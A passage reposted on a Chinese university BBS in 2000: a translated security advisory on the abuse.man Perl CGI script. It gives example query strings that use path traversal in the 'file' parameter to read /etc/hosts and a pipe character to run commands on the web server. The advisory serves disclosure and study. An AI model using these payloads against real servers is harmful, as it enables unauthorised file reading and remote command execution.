荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: bstone (无心伤害), 信区: Hacker
标  题: abuse.man CGI漏洞可以执行任意命令
发信站: BBS 荔园晨风站 (Sat Mar 18 07:57:20 2000), 站内信件



  所有系统 AIX BSD(eg,OpenBSD) Digital Unix HP-UX IRIX Linux FreeBSD SCO UNIX
SunOS Solaris Windows Other 漏洞类型 远程进入系统 本地越权访问 拒绝服务攻击 嵌入
恶意代码 Web数据接口 其他类型 发布日期 一周内 一个月内 所有



  首页 >> 安全漏洞 >>

  abuse.man CGI漏洞可以执行任意命令

发布日期: 2000-3-18

更新日期: 2000-3-18
受影响的系统:  abuse.man (webmanager kit)
描述:
--------------------------------------------------------------------------------


abuse.man是一个perl cgi脚本,用来将client的请求转向指定页面,它也可以很容易地管

虚拟主机。但是它存在一个有严重安全漏洞,允许远程或者本地用户`在web服务器上执行任

命令(以httpd运行uid执行),攻击者可能利用这个漏洞获取更高权限.

<* 来源:  dethy (deth@synnergy.net)
           dvorak (dvorak@synnergy.net)
*>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



abuse.man用file变量来指定要转向的url地址(使用了绝对路径):

http://server.com/file=/disk1/e/domain/public_html/index.html&
domain=hostname.com&script=/index.html


攻击者可以修改file变量,这样就可以浏览系统文件或者执行任意命令。
例如:

浏览/etc/hosts文件:
Eg: file=/disk1/e/domain/public_html/../../../../../../etc/hosts&

通过增加管道符,可以执行命令,这里列出根目录内容:


Eg: file=/disk1/e/domain/public_html/../../../../../../bin/ls+/|&



--------------------------------------------------------------------------------
建议:
暂无



绿色兵团翻译整理,未经许可,不得转载
欢迎访问我们的站点http://www.isbase.com/
绿色兵团给您安全的保障





 关于我们   合作伙伴   绿盟月刊   安全论坛   系统漏洞   安全文献   工具介绍   服
务项目   客户专区

--------------------------------------------------------------------------------

绿盟计算机网络安全技术有限公司版权所有   联系:isbase@isbase.net
&copy; 1999,2000 isbase Corporation. All rights Reserved.

--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.23]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店